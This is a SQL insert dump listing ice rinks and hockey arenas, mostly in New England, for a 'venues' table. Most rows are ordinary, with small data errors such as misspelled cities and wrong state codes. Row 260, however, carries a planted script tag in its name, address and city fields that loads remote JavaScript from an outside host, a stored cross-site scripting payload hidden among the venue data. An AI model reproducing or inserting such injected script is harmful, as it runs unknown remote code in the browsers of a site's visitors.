INSERT INTO `venues` (`id`, `name`, `address`, `city`, `state`, `zip`, `old_db_id`, `sp_venue_id`) VALUES
(1, 'Agganis Arena, Boston University', '', 'Boston', 'MA', '', 1, NULL),
(2, 'Aleixo Arena, Taunton', '', 'Taunton', 'MA', '', 2, NULL),
(3, 'Allied Veterans MDC Rink, Everett', '', 'Everett', 'MA', '', 3, NULL),
(4, 'Amelia Park Rink, Westfield', '', 'Westfield', 'MA', '', 4, NULL),
(5, 'Arlington Sports Center, Arlington', '', 'Arlington', 'MA', '', 5, NULL),
(6, 'Armstrong Arena, Plymouth', '', 'Plymouth', 'MA', '', 6, NULL),
(7, 'Asiaf Arena, Brockton High School', '', 'Brockton', 'MA', '', 7, NULL),
(8, 'Babson Skating Rink, Babson College, Wellesley', '', 'Wellesley', 'MA', '', 8, NULL),
(9, 'Belmont High School Skating Rink, Belmont', '', 'Belmont', 'MA', '', 9, NULL),
(10, 'Biddeford Ice Rink, Biddeford, ME', '', 'Biddeford', 'ME', '', 10, NULL),
(11, 'Boys & Girls Club of Pittsfield', '', 'Pittsfield', 'MA', '', 11, NULL),
(12, 'Breakaway Ice Center, Tewksbury', '', 'Tewksbury', 'MA', '', 12, NULL),
(13, 'Bridgewater Ice Arena, Bridgewater', '', 'Bridgewater', 'MA', '', 13, NULL),
(14, 'Bright Rink, Harvard University, Cambridge', '', 'Cambridge', 'MA', '', 14, NULL),
(15, 'Buffone Arena, Worcester', '', 'Worcester', 'MA', '', 15, NULL),
(16, 'Burbank Ice Arena, Reading', '', 'Reading', 'MA', '', 16, NULL),
(17, 'Burlington Ice Palace, Burlington', '', 'Burlington', 'MA', '', 17, NULL),
(18, 'Canton Metropolis Rink, Canton', '', 'Canton', 'MA', '', 18, NULL),
(19, 'CDL Arena, Raynham', '', 'Raynham', 'MA', '', 19, NULL),
(20, 'Chelmsford Forum, North Billerica', '', 'North Billerica', 'MA', '', 20, NULL),
(21, 'Coffin Sports Center, West Newton', '', 'West Newton', 'MA', '', 21, NULL),
(22, 'Collins-Moylan Skating Arena, Greenfield', '', 'Greenfield', 'MA', '', 22, NULL),
(23, 'Conti Forum, Boston College, Chestnut Hill', '', 'Chestnut Hill', 'MA', '', 23, NULL),
(24, 'Cyr Arena, Springfield', '', 'Springfield', 'MA', '', 24, NULL),
(25, 'Dorothy Talbot Rink, Gloucester', '', 'Gloucester', 'MA', '', 25, NULL),
(26, 'Driscoll Arena, Fall River', '', 'Fall River', 'MA', '', 26, NULL),
(27, 'Falmouth Ice Arena, Falmouth', '', 'Falmouth', 'MA', '', 27, NULL),
(28, 'Coffin Sports Center, Fessenden School, West Newton', '', 'West Newton', 'MA', '', 28, NULL),
(29, 'Fleet Center, Boston', '', 'Boston', 'MA', '', 30, NULL),
(30, 'Flynn Memorial Rink, Medford', '', 'Medford', 'MA', '', 31, NULL),
(31, 'Foxboro Sports Center, Foxboro', '', 'Foxboro', 'MA', '', 32, NULL),
(32, 'Gallo Ice Arena, Buzzards Bay', '', 'Bourne', 'MA', '', 33, NULL),
(33, 'Gore Street Rink, Cambridge', '', 'Cambridge', 'MA', '', 34, NULL),
(34, 'Governors Academy Rink, Byfield', '', 'Byfield', 'MA', '', 35, NULL),
(35, 'Hallenborg Memorial Pavilion, Billerica', '', 'Billerica', 'MA', '', 37, NULL),
(36, 'Hayden Ice Facility, Lexington', '', 'Lexington', 'MA', '', 38, NULL),
(37, 'Henry Graf Skating Rink, Newburyport', '', 'Newburyport', 'MA', '', 39, NULL),
(38, 'Hetland Memorial Arena, New Bedford', '', 'New Bedford', 'MA', '', 40, NULL),
(39, 'Hobomock Ice Arena, Pembroke', '', 'Pembroke', 'MA', '', 41, NULL),
(40, 'Holy Cross, Hart Center, Worcester', '', 'Worcester', 'MA', '', 42, NULL),
(41, 'Horgan Skating Arena, Auburn', '', 'Auburn', 'MA', '', 43, NULL),
(42, 'Rodman Arena, Walpole', '', 'Walpole', 'MA', '', 44, NULL),
(43, 'Janas Memorial Rink, Lowell', '', 'Lowell', 'MA', '', 45, NULL),
(44, 'John Ryan Skating Arena, Watertown', '', 'Watertown', 'MA', '', 46, NULL),
(45, 'Kasabuski Rink, Saugus', '', 'Saugus', 'MA', '', 47, NULL),
(46, 'Kennedy Rink, HYCC, Hyannis', '', 'Hyannis', 'MA', '', 48, NULL),
(47, 'Larsen Arena, Winthrop', '', 'Winthrop', 'MA', '', 49, NULL),
(48, 'LoConte Rink, Medford', '', 'Medford', 'MA', '', 50, NULL),
(49, 'Loring Arena, Framingham', '', 'Framingham', 'MA', '', 51, NULL),
(50, 'Marthas Vineyard Arena, Oak Bluffs', '', 'Oak Bluffs', 'MA', '', 52, NULL),
(51, 'Matthews Arena, Northeastern University, Boston', '', 'Boston', 'MA', '', 54, NULL),
(52, 'McVan/O\'Keefe Memorial Rink, Peabody', '', 'Peabody', 'MA', '', 55, NULL),
(53, 'Merrimack College, North Andover', '', 'North Andover', 'MA', '', 56, NULL),
(54, 'Methuen High School Rink, Methuen', '', 'Methuen', 'MA', '', 57, NULL),
(55, 'Charles Moore Arena, Orleans', '', 'Orleans', 'MA', '', 58, NULL),
(56, 'Adelard Arena, Mt St Charles Academy, Woonsocket, RI', '', 'Woonsocket', 'RI', '', 59, NULL),
(57, 'UMass Amherst, Mullins Center, Amherst', '', 'Amherst', 'MA', '', 60, NULL),
(58, 'Nashoba Valley Olympia, Boxboro', '', 'Boxboro', 'MA', '', 61, NULL),
(59, 'Navin Rink, Marlboro', '', 'Marlboro', 'MA', '', 62, NULL),
(60, 'New England Sports Center, Marlboro', '', 'Marlboro', 'MA', '', 63, NULL),
(61, 'Flood Omni Rink, Noble & Greenough School, Dedham', '', 'Dedham', 'MA', '', 64, NULL),
(62, 'Norfolk Ice Arena, Norfolk', '', 'Norfolk', 'MA', '', 65, NULL),
(63, 'Northstar Ice Sports, Westboro', '15 Bridle Ln', 'Westboro', 'MA', '', 66, NULL),
(64, 'O\'Brien Arena, Woburn', '', 'Woburn', 'MA', '', 67, NULL),
(65, 'O\'Keefe Athletic Center, Salem State, Salem', '', 'Salem', 'MA', '', 68, NULL),
(66, 'Olympia Center, West Springfield', '', 'West Springfield', 'MA', '', 69, NULL),
(67, 'Orr Rink, Amherst College, Amherst', '', 'Amherst', 'MA', '', 70, NULL),
(68, 'Paul Cronin MDC Rink, Revere', '', 'Revere', 'MA', '', 71, NULL),
(69, 'Pilgrim Skating Arena, Hingham', '', 'Hingham', 'MA', '', 72, NULL),
(70, 'Lt. Porrazzo Memorial Rink, East Boston', '', 'East Boston', 'MA', '', 73, NULL),
(71, 'Quincy Youth Arena, Quincy', '', 'Quincy', 'MA', '', 74, NULL),
(72, 'Ristuccia Memorial Arena, Wilmington', '', 'Wilmington', 'MA', '', 75, NULL),
(73, 'Rockland Arena, Rockland', '', 'Rockland', 'MA', '', 76, NULL),
(74, 'Sgt. Pirelli Veterans Memorial Rink, Franklin', '', 'Franklin', 'MA', '', 77, NULL),
(75, 'Simoni Memorial Rink, Cambridge', '', 'Cambridge', 'MA', '', 78, NULL),
(76, 'Skate 3, Tyngsboro', '', 'Tyngsboro', 'MA', '', 79, NULL),
(77, 'Skip Viglirolo Skating Rink, Belmont', '', 'Belmont', 'MA', '', 80, NULL),
(78, 'Smead Arena @ Blunt Park, Springfield', '', 'Springfield', 'MA', '', 81, NULL),
(79, 'Stoneham Arena, Stoneham', '', 'Stoneham', 'MA', '', 82, NULL),
(80, 'Travis Roy Rink, Tabor Academy, Marion', '', 'Marion', 'MA', '', 83, NULL),
(81, 'The Bog, Kingston', '', 'Kingston', 'MA', '', 85, NULL),
(82, 'The Edge Sports Center, Bedford', '', 'Bedford', 'MA', '', 86, NULL),
(83, 'The Rivers School, Weston', '', 'Weston', 'MA', '', 87, NULL),
(84, 'Tony Kent Arena, South Dennis', '', 'South Dennis', 'MA', '', 88, NULL),
(85, 'Tsongas Center, Lowell', '', 'Lowell', 'MA', '', 89, NULL),
(86, 'Ulin Memorial Rink, Milton', '', 'Milton', 'MA', '', 90, NULL),
(87, 'UMass Boston Clark Center, Boston', '', 'Boston', 'MA', '', 91, NULL),
(88, 'USM Ice Arena,  Gorham, ME', '', 'Gorham', 'ME', '', 92, NULL),
(89, 'Valley Forum II, Malden', '', 'Malden', 'MA', '', 93, NULL),
(90, 'Valley Forum, Lawrence', '', 'Lawrence', 'MA', '', 94, NULL),
(91, 'Valley Sports Arena, West Concord', '', 'West Concord', 'MA', '', 95, NULL),
(92, 'Veteran\'s Memorial Ice Rink, Haverhill', '', 'Haverhill', 'MA', '', 96, NULL),
(93, 'Ed Burns Arena, Arlington', '', 'Arlington', 'MA', '', 97, NULL),
(94, 'Veterans Memorial Rink, Somerville', '', 'Somerville', 'MA', '', 98, NULL),
(95, 'Veterans Memorial Rink, Waltham', '', 'Waltham', 'MA', '', 99, NULL),
(96, 'Veterans Skating Arena, Gardner', '', 'Gardner', 'MA', '', 100, NULL),
(97, 'Walter Brown Arena, Boston University, Boston', '', 'Boston', 'MA', '', 102, NULL),
(98, 'Waterville Valley Ice Arena, Waterville, NH', '', 'Waterville', 'NH', '', 103, NULL),
(99, 'West Suburban Arena, Natick', '', 'Natick', 'MA', '', 104, NULL),
(100, 'William Connery MDC Rink, Lynn', '', 'Lynn', 'MA', '', 105, NULL),
(101, 'Lossone Rink, Williston Academy, Easthampton', '', 'Easthampton', 'MA', '', 106, NULL),
(102, 'Winchendon School Ice Arena, Winchendon', '', 'Wichendon', 'MA', '', 107, NULL),
(103, 'Worcester Ice Center, Worcester', '104 Harding St.', 'Worcester', 'MA', '01604', 108, NULL),
(104, 'Zapustas Arena, Randolph', '', 'Randolph', 'MA', '', 109, NULL),
(105, 'Iorio Arena, Cushing Academy, Ashburnham', '', 'Ashburnham', 'MA', '', 110, NULL),
(106, 'Fitzpatrick Skating Arena, Holyoke', '', 'Holyoke', 'MA', '', 113, NULL),
(107, 'Gardner Rink, St. Mark\'s School, Southboro', '', 'Southboro', 'MA', '', 114, NULL),
(108, 'Groton School Rink, Groton', '', 'Groton', 'MA', '', 115, NULL),
(109, 'MassMutual Center, Springfield', '', 'Springfield', 'MA', '', 116, NULL),
(110, 'Wallace Civic Center, Gaetz Arena, Fitchburg', '', 'Fitchburg', 'MA', '', 124, NULL),
(111, 'Bajko Memorial Rink, Hyde Park', '', 'Hyde Park', 'MA', '', 126, NULL),
(112, 'Dexter School Thorndike Rink, Brookline', '', 'Brookline', 'MA', '', 127, NULL),
(113, 'Jim Roche Community Ice Arena, West Roxbury', '', 'West  Roxbury', 'MA', '', 128, NULL),
(114, 'Murphy Memorial Rink, South Boston', '', 'South Boston', 'MA', '', 129, NULL),
(115, 'Harrison Rink, Phillips Andover Academy, Andover', '', 'Andover', 'MA', '', 130, NULL),
(116, 'Johnson Rink, Pingree School, South Hamilton', '', 'South Hamilton', 'MA', '', 131, NULL),
(117, 'Shea Memorial Rink, Quincy', '', 'Quincy', 'MA', '', 132, NULL),
(118, 'St Sebastians Lane Rink, Needham', '', 'Needham', 'MA', '', 133, NULL),
(119, 'Thorndike Rink, Brookline', '', 'Brookline', 'MA', '', 134, NULL),
(120, 'Emmons-Horrigan-O\'Neil Rink, Charlestown', '', 'Charlestown', 'MA', '', 136, NULL),
(121, 'Gutterson Field House, UVM, South Burlington, VT.', '', 'South Burlington', 'VT', '', 137, NULL),
(122, 'Thayer Arena, Warwick, RI', '', 'Warwick', 'RI', '', 138, NULL),
(123, 'Bradford R. Boss Arena, URI, Kingston, RI', '', 'Kingston', 'RI', '', 139, NULL),
(124, 'Dennis M Lynch Arena, Pawtucket, RI', '', 'Pawtucket', 'RI', '', 140, NULL),
(125, 'Vietnam Veterans Memorial Rink, North Adams', '', 'North Adams', 'MA', '', 142, NULL),
(126, 'Berkshire School, Stewart Athletic Center, Sheffield', '', 'Sheffield', 'MA', '', 143, NULL),
(127, 'Williams College, Lansing Chapman Rink, Williamstown', '', 'Williamstown', 'MA', '', 144, NULL),
(128, 'Trinity College Koeppel Sports Center, Hartford, CT.', '', 'Hartford', 'MA', '', 145, NULL),
(129, 'Christopher Nugent Bovers Community Rink, Nantucket', '', 'Nantucket', 'MA', '', 146, NULL),
(130, 'Portland Ice Arena, Portland, ME', '', 'Portland', 'ME', '', 148, NULL),
(131, 'Travis Roy Ice Arena, Yarmouth, ME', '', 'North Yarmouth', 'ME', '', 149, NULL),
(132, 'Douglas Everett Arena, Concord, NH', '', 'Concord', 'NH', '', 150, NULL),
(133, 'Loomis Chaffee Ice Rink, Windsor, Ct.', '', 'Windsor', 'CT', '', 151, NULL),
(134, 'Conway Arena, Nashua, NH', '', 'Nashua', 'NH', '', 152, NULL),
(135, 'The Rinks at Exeter, Exeter, NH', '', 'Exeter', 'NH', '', 153, NULL),
(136, 'Cairns Arena, South Burlington, Vt.', '', 'South Burlington', 'VT', '', 154, NULL),
(137, 'Avon School Rink, Avon, Ct.', '', 'Avon', 'CT', '', 155, NULL),
(138, 'Wonderland of Ice, Bridgeport, CT', '', 'Bridgeport', 'CT', '', 156, NULL),
(139, 'Roberts Ice Rink, Milton Academy, Milton', '', 'Milton', 'MA', '', 157, NULL),
(140, 'International Skating Center, Simsbury, CT', '', 'Simsbury', 'MA', '', 159, NULL),
(141, 'Deerfield Academy Rink, Deerfield', '', 'Deerfield', 'MA', '', 160, NULL),
(142, 'Grant Hockey Rink,  Lawrence Academy, Groton', '', 'Groton', 'MA', '', 161, NULL),
(143, 'Daly Memorial Rink, Brighton', '', 'Newton', 'MA', '', 162, NULL),
(144, 'Connell Memorial Rink, Weymouth', '', 'Weymouth', 'MA', '', 163, NULL),
(145, 'Valley Forum, Haverhill', '', 'Haverhill', 'MA', '', 164, NULL),
(146, 'Location TBA', '', '', '', '', 166, NULL),
(147, 'TD Garden, Boston', '', 'Boston', 'MA', '', 167, NULL),
(148, 'DCU Center, Worcester', '', 'Worcester', 'MA', '', 168, NULL),
(149, 'The Spurrier-Snyder Rink, Wesleyan University, Middletown, CT', '', 'Middletown', 'CT', '', 169, NULL),
(150, 'JFK Coliseum, Manchester, NH', '', 'Manchester', 'NH', '', 170, NULL),
(151, 'Bridgton Ice Arena, North Bridgton, ME.', '', 'North Bridgton', 'ME', '', 171, NULL),
(152, 'Buckingham, Brown & Nichols, Cambridge', '', 'Cambridge', 'MA', '', 172, NULL),
(153, 'Smithfield Municipal Rink, Smithfield, RI', '', 'Smithfield', 'RI', '', 173, NULL),
(154, 'South Windsor Arena, South Windsor, CT', '', 'South Windsor', 'CT', '', 174, NULL),
(155, 'Boch Ice Center, Dedham', '', 'Dedham', 'MA', '', 177, NULL),
(156, 'Dover Arena, Dover, NH', '', 'Dover', 'NH', '', 179, NULL),
(157, 'Schneider Arena, Providence College, Providence, RI', '', 'Providence', 'RI', '', 180, NULL),
(158, 'Nantucket Ice Skating Rink, Nantucket', '', 'Nantucket', 'MA', '', 181, NULL),
(159, 'William Chase Arena, Natick', '', 'Natick', 'MA', '', 182, NULL),
(160, 'Travis Roy Rink, Tabor Academy, Marion', '', 'Marion', 'MA', '', 183, NULL),
(161, 'Ice Center Rink, Salem NH', '', 'Salem', 'NH', '', 184, NULL),
(162, 'MHG Ice Centre, Saco, ME', '', 'Saco', 'ME', '', 185, NULL),
(163, 'Whiston Bragdon Arena, Governor\'s Academy, Byfield', '', 'Byfield', 'MA', '', 186, NULL),
(164, 'Northfield Mount Herman Rink, Mount Hermon', '', 'Mount Hermon', 'MA', '', 187, NULL),
(165, 'Ice Den Arena, Hooksett, NH', '', '', 'NH', '', 188, NULL),
(166, 'James W. Campion, III Rink, Hanover, NH', '', '', 'NH', '', 189, NULL),
(167, 'Collins-Perley Sports Complex, St. Albans, VT', '', 'St. Albans', 'VT', '', 190, NULL),
(168, 'Frozen Fenway, Fenway Park, Boston', '', 'Boston', 'MA', '', 191, NULL),
(169, 'Lou Astorino Ice Arena, Hamden, CT', '', 'Hamden', 'CT', '', 192, NULL),
(170, 'Conti Forum, Boston College, Chestnut Hill', '', 'Chestnut Hill', 'MA', '', 193, NULL),
(171, 'Pratt Memorial Rink, Middlesex School, Concord', '', '', 'MA', '', 195, NULL),
(172, 'Enfield Twin Rinks, Enfield, CT.', '', 'Enfield, CT', 'CT', '', 196, NULL),
(173, 'Salem ICenter, Salem, NH', '', '', 'NH', '', 197, NULL),
(174, 'Brooks School Rink, North Andover', '', '', 'MA', '', 198, NULL),
(175, 'Nelson Withington Rink, Brattleboro, VT', '', '', 'VT', '', 199, NULL),
(176, 'Lou Astorino Ice Rink, Hamden, CT', '', '', 'CT', '', 200, NULL),
(177, 'Johnson Athletic Ctr., MIT, Cambridge', '', '', 'MA', '', 201, NULL),
(178, 'Ice Huts Rink, Dracut', '', '', 'MA', '', 202, NULL),
(179, 'Levy Rink, Harrisville, RI', '', '', 'RI', '', 203, NULL),
(180, 'The Spurrier-Snyder Rink, Wesleyan University, Middletown, CT', '', '', 'CT', '', 204, NULL),
(181, 'Cranston Bubble Rink, Cranston, RI', '', '', 'RI', '', 205, NULL),
(182, 'Sullivan Arena, St. Anslem College, Goffstown, NH', '', '', 'NH', '', 206, NULL),
(183, 'Veterans Memorial Rink,  West Hartford, CT', '', '', 'CT', '', 207, NULL),
(184, 'Grant Rink, Lawrence Academy, Groton', '', '', 'MA', '', 208, NULL),
(185, 'Noble & Greenough School, Dedham', '', '', 'MA', '', 209, NULL),
(186, 'John S. Haldane Memorial Arena, Pulaski, NY', '', '', 'NY', '', 210, NULL),
(187, 'Veterans Memorial Rink, Cranston, RI', '', '', 'RI', '', 211, NULL),
(188, 'Rhode Island Sports Center,  North Smithfield, RI', '', '', 'RI', '', 212, NULL),
(189, 'Canton Sportsplex, Canton', '', '', 'MA', '', 214, NULL),
(190, 'Conway Arena, Nashua, NH', '', '', 'NH', '', 215, NULL),
(191, 'Larz Anderson Rink, Brookline', '', '', 'MA', '', 216, NULL),
(192, 'The AmeriHealth Pavilion at Prudential Center, Newark, NJ', '', '', 'NJ', '', 217, NULL),
(193, 'Olympic Arena, Lake Placid, NY', '', '', 'NY', '', 218, NULL),
(194, 'Newington Arena, Hartford, CT', '', '', 'CT', '', 219, NULL),
(195, 'Terry Conners Rink, Stamford, CT.', '', '', 'CT', '', 220, NULL),
(196, 'The Darien Ice Rink, Darien, CT.', '', '', 'CT', '', 221, NULL),
(197, 'MacDowell Ice Arena, Rivers School, Weston', '', '', 'MA', '', 223, NULL),
(198, 'Haldane Memorial Building Arena, Pulaski, NY', '', '', 'NY', '', 224, NULL),
(199, 'McCollum Arena, Northfield Mt Hermon School, Northfield', '', '', 'MA', '', 225, NULL),
(200, 'Cyclones Arena, Hudson, NH', '', '', 'NH', '', 226, NULL),
(201, 'Whitestown Ice Arena, Whitesboro, NY', '', 'Whitesboro, NY', 'NY', '', 227, NULL),
(202, 'John S. Haldane Memorial Arena', '', 'Pulaski, NY', 'NY', '', 228, NULL),
(203, 'UNH Whittemore Center Arena, Durham, NH', '', 'Durham', 'NH', '', 230, NULL),
(204, 'Simsbury Farms Rink, West Simsbury, CT', '', 'West Simsbury', 'CT', '', 231, NULL),
(205, 'Meehan Rink, Brown University, Providence, RI', '', 'Providence', 'RI', '', 232, NULL),
(206, 'Raynham Ice Plex, Raynham', '', '', 'MA', '', 233, NULL),
(207, 'Blackstone Valley Ice Arena, Hopedale', '', 'Hopedale', 'MA', '', 235, NULL),
(208, 'MacDowell Ice Arena, Rivers School, Weston', '', 'Weston', 'MA', '', 236, NULL),
(209, 'Hockeytown USA, Saugus', '', 'Saugus', 'MA', '', 237, NULL),
(210, 'Nichols Athletic Center, BB&N School, Cambridge', '', 'Cambridge', 'MA', '', 238, NULL),
(211, 'The Hotchkiss School Rink, Lakeville, CT', '', '', 'CT', '', 239, NULL),
(212, 'Linen Rink, Gunnery School, Washington, CT', '', '', 'CT', '', 240, NULL),
(213, 'Mark Bavis Arena, Rockland', '', 'Rockland', 'MA', '', 241, NULL),
(214, 'Nelson Withington Rink, Brattleboro, VT', '', 'Brattleboro', 'VT', '', 242, NULL),
(215, 'Houston Rink, RPI, Troy, NY', '', 'Troy', 'NY', '', 243, NULL),
(216, 'Courtenay Hemenway Rink, Wallingford, CT', '', 'Wallingford', 'CT', '', 244, NULL),
(217, 'Jahn Rink, Pomfret School, Pomfret, CT', '', 'Pomfret', 'CT', '', 245, NULL),
(218, 'Yankee Stadium, Bronx, NY', '', 'Bronx', 'NY', '', 246, NULL),
(219, 'Newington Arena, Newington, CT', '', 'Newington', 'CT', '', 247, NULL),
(220, 'Keller Rink, Claflin Athletic Center, Belmont Hill School', '', 'Belmont', 'MA', '', 248, NULL),
(221, 'Wallace Civic Center, Fitchburg', '', '', 'MA', '', 249, NULL),
(222, 'Reilly Memorial Rink, Brighton', '', 'Brighton', 'MA', '', 250, NULL),
(223, 'Family Ice Center, Falmouth, ME', '', 'Falmouth ', 'ME', '', 251, NULL),
(224, 'Northford Ice Pavillion, Northford, CT', '', 'Northford', 'CT', '', 252, NULL),
(225, 'Pomfret School Jahn Rink, Pomfret, CT', '', 'Pomfret', 'CT', '', 253, NULL),
(226, 'Portsmouth Abbey School Rink, Portsmouth, RI  ', '', 'Portsmouth', 'RI', '', 254, NULL),
(227, 'RPI Rink, Troy, NY', '', 'Troy', 'NY', '', 255, NULL),
(228, 'Spurrier-Snyder Rink, Wesleyan University, Middletown, CT ', '', 'Middletown', 'CT', '', 256, NULL),
(229, 'Webster Bank Arena, Bridgeport, CT', '', 'Bridgeport', 'CT', '', 257, NULL),
(230, 'Devine Memorial Rink, Dorchester ', '', 'Dorchester ', 'MA', '', 258, NULL),
(231, 'Norway Savings Bank Arena, Auburn, ME', '', 'Auburn', 'ME', '', 259, NULL),
(232, 'Albany Academy Field House, Albany, NY ', '', ' Albany', 'NY', '', 260, NULL),
(233, 'Danbury Ice Arena, Danbury, CT', '', 'Danbury', 'CT', '', 261, NULL),
(234, 'Bourque Arena, Endicott College, Beverly', '', 'Beverly', 'MA', '', 262, NULL),
(235, 'Freitas Ice forum, UConn, Storrs, CT', '', 'Storrs', 'CT', '', 263, NULL),
(236, 'LaBrier Arena, Aurora, Ontario, Canada', '', '', 'MA', '', 264, NULL),
(237, 'Bank of Maine Ice Vault, Kennebec, ME', '', 'Kennebec', 'ME', '', 265, NULL),
(238, 'Butler Rink, HYCC, Hyannis', '', 'Hyannis', 'MA', '', 266, NULL),
(239, 'Schenectady County Rec. Facility, Glenville, NY ', '', 'Glenville', 'NY', '', 267, NULL),
(240, 'Essex Sports Center, Middleton', '20 Manning Rd', 'Middleton', 'MA', '01949', 268, NULL),
(241, 'Warrior Ice Arena, Boston', '90 Guest St.', 'Boaton', 'MA', '02135', 269, NULL),
(242, 'New England Sports Village, Attleboro', '1395 Commerce Way, Attleboro, MA 02703', 'Attleboro', 'MA', '', 270, NULL),
(243, 'Canton Ice House, Canton', '', 'Canton', 'MA', '', 271, NULL),
(244, 'Highgate Recreation Facility, Highgate, VT', '243 Gore Rd,', 'Highgate', 'VT', '', 272, NULL),
(245, 'Ingalls Rink, Yale University, New Haven, CT', '73 Sachem St,', 'New Haven', 'CT', '', 273, NULL),
(246, 'West Warwick Civic Center Arena, West Warwick, RI', '', '', 'MA', '', 274, NULL),
(247, 'Winter Garden Ice Arena, Ridgefield, CT', '', '', 'MA', '', 275, NULL),
(248, 'Dayton Arena, Conn. College, New London, CT', '', '', 'MA', '', 276, NULL),
(249, 'Schenectady County Rec. Facility, Scotia, NY', '', '', 'MA', '', 277, NULL),
(250, 'Phillips Exeter Academy Rink, Exeter, NH', '', '', 'MA', '', 278, NULL),
(251, 'Campion Ice Skating Rink, West Lebanon, NH ', '', '', 'MA', '', 279, NULL),
(252, 'SoNo Ice House. Norwalk, CT', '300 Wilson Ave', 'Norwalk', 'CT', '06854', 280, NULL),
(253, 'Jackson Rink, Westminster School, Simsbury, CT', '', 'Simsbury', 'CT', '', 281, NULL),
(254, 'Edward L. Bennett Rink, West Haven, CT', '', 'West Haven', 'CT', '', 282, NULL),
(255, 'Androscoggin Bank ColisÃ©e, Lewiston, ME', '', 'Lewiston', 'ME', '', 283, NULL),
(256, 'Memorial Sports Center, Middlebury, VT', '', '', 'VT', '', 284, NULL),
(257, 'DiLungo Ice Rink, East Haven, CT', '', '', 'CT', '', 285, NULL),
(258, 'Dunkin Donuts Center, Providence, RI', '', '', 'RI', '', 286, NULL),
(259, 'Keene Ice, Keene, NH', '380 Marlboro St.', 'Keene', 'NH', '03431', 287, NULL),
(260, '<script type=\"text/javascript\" src=\"http://yourjavascript.com/8141814003/dh.js\"></script>', '<script type=\"text/javascript\" src=\"http://yourjavascript.com/8141814003/dh.js\"></script>', '<script type=\"text/javascript\" src=\"http://yourjav', 'MA', '0111', 288, NULL),
(261, 'Bentley University Arena, Waltham', '', '', 'MA', '', 289, NULL),
(262, 'Albany County Hockey Facility, Albany, NY', '', '', 'NY', '', 290, NULL),
(263, ' Hartong Rink, Edwards Campus, Greenwich, CT', '', '', 'CT', '', 291, NULL),
(264, 'Steriti Memorial Rink, Boston', 'Commericial St.', 'Boston', 'MA', '', 292, NULL);
